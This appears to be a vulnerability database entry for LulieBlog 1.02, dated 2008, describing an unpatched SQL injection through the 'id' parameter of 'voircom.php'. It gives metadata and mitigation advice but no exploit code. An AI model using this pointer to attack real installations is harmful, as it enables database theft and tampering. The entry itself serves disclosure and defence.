Vendor: LulieBlog
By: IRCRASH (Dr.Crash)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: LulieBlog
Affected Version From: 01.02
Affected Version To: 01.02
Patch Exists: NO
Related CWE: N/A
CPE: a:lulieblog:lulieblog:1.02
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
LulieBlog Version 1.02 Remote Sql Injection
A vulnerability exists in LulieBlog Version 1.02 which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in 'voircom.php'. An attacker can exploit this vulnerability to gain access to sensitive information from the database, modify data, delete data, or gain access to the server.
Mitigation:
Use input validation and parameterized queries to prevent SQL injection attacks. Sanitize all user input to ensure that it conforms to the expected format, using centralized routines whenever possible.